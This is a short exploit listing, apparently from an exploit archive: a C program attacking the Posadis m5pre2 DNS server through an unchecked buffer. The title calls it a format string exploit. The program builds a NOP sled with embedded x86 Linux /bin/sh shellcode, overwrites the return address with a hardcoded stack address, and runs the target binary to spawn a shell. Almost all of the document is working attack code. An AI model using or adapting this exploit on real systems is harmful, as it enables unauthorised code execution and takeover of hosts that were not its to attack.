Posadis m5pre2 local format string exploit.
025e81c77e339b0490a61b132dcf3996293528d7e06703be59938c0e883873e7
/* local posadis m5pre2 exploit by eSDee of Netric - (www.netric.org)
* ------------------------------------------------------------------
* The formatstring bug (discovered by kkr) is fixed in the log_print
* function in m5pre2. However, there exists an unchecked buffer in
* m5pre2 and prior, that can be exploited too.
* ------------------------------------------------------------------
*/
#include <stdio.h>
char shellcode[]=
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
int
main ()
{
unsigned long ret = 0xbffff550;
char buf[4068];
int i=0;
memset(buf, 0x90, sizeof(buf));
for (0; i < sizeof(shellcode) - 1;i++) {
buf[4000+i] = shellcode[i];
}
buf[4063] = (ret & 0x000000ff);
buf[4064] = (ret & 0x0000ff00) >> 8;
buf[4065] = (ret & 0x00ff0000) >> 16;
buf[4066] = (ret & 0xff000000) >> 24;
buf[4067] = '\0';
printf("ret: 0x%x\n",ret);
execl("./posadis", "posadis", buf, NULL);
return 0;
}